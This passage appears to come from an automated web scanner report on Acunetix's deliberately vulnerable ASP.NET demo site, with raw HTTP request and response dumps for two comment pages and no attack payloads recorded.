href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=2
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14397
Response Body - size: 14,397 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WBB8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT8fAAUSUmVhZE5ld3MuYXNweD9pZD0yZAIHDxYCHwEFrAIyMSBKdWx5IDIwMDUgLSBTdGFydC11cCBjb21wYW55IEFjdW5ldGl4IHJlbGVhc2VkIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXI6IGEgdG9vbCB0byBhdXRvbWF0aWNhbGx5IGF1ZGl0IHdlYnNpdGUgc2VjdXJpdHkuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgMiBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUsIGxhdW5jaGVzIHBvcHVsYXIgd2ViIGF0dGFja3MgKFNRTCBJbmplY3Rpb24gZXRjLikgYW5kIGlkZW50aWZpZXMgdnVsbmVyYWJpbGl0aWVzIHRoYXQgbmVlZCB0byBiZSBmaXhlZC5kZLQBJ3hOt3r5jKtYjVFFKdowCSWC" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKpxZClDQKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBKShEjjcO8QZ+TqRo3QvanE8jv9G" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <a href="ReadNews.aspx?id=2" id="anchNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</a> <DIV id="divNewsShort" class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=3
Method	GET
Parameter
Attack
Evidence
Show / hide Request and Response
Request Header - size: 330 bytes.	GET http://testaspnet.vulnweb.com/Comments.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 14066
Response Body - size: 14,066 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WBB8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhHwAFElJlYWROZXdzLmFzcHg/aWQ9M2QCBw8WAh8BBagBMjYgSmFudWFyeSAyMDA1IC0gQSBiZXRhIHZlcnNpb24gb2YgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciBoYXMgYmVlbiByZWxlYXNlZCB0b2RheS4gVGhlIGJldGEgaXMgYXZhaWxhYmxlIGZvciBkb3dubG9hZCBhdCBodHRwOi8vd3d3LmFjdW5ldGl4LmNvbS9kb3dubG9hZC8uZGQzP/MHHnstJY/fWtD4cYSdoYkheQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQLj8dP9DwKAgcfvBQKFzrr8AQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBI1RRJ3EGUKdWdAQOQ9gMGQKbUn7" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:37:35 AM</DIV> <a href="ReadNews.aspx?id=3" id="anchNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a> <DIV id="divNewsShort" class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" 